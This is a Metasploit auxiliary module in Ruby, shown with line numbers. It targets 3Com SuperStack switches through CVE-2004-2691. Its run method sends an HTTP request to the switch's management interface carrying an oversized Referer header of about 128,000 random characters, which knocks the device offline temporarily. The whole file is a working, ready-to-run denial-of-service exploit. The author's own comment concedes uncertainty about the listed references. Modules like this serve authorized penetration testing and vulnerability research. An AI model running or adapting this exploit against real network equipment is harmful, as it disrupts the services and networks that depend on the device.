1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => '3Com SuperStack Switch Denial of Service',
15
        'Description' => %q{
16
          This module causes a temporary denial of service condition
17
          against 3Com SuperStack switches. By sending excessive data
18
          to the HTTP Management interface, the switch stops responding
19
          temporarily. The device does not reset. Tested successfully
20
          against a 3300SM firmware v2.66. Reported to affect versions
21
          prior to v2.72.
22
        },
23
        'Author' => [ 'aushack' ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          # aushack - I am not sure if these are correct, but the closest match!
27
          [ 'OSVDB', '7246' ],
28
          [ 'CVE', '2004-2691' ],
29
          [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
30
        ],
31
        'DisclosureDate' => '2004-06-24',
32
        'Notes' => {
33
          'Stability' => [CRASH_SERVICE_DOWN],
34
          'SideEffects' => [],
35
          'Reliability' => []
36
        }
37
      )
38
    )
39

40
    register_options([ Opt::RPORT(80) ])
41
  end
42

43
  def run
44
    connect
45
    print_status("Sending DoS packet to #{rhost}:#{rport}")
46

47
    sploit = "GET / HTTP/1.0\r\n"
48
    sploit << 'Referer: ' + Rex::Text.rand_text_alpha(1) * 128000
49

50
    sock.put(sploit + "\r\n\r\n")
51
    disconnect
52
    print_error('DoS packet unsuccessful')
53
  rescue ::Rex::ConnectionRefused
54
    print_error("Unable to connect to #{rhost}:#{rport}")
55
  rescue ::Errno::ECONNRESET
56
    print_good("DoS packet successful. #{rhost} not responding.")
57
  end
58
end
59

60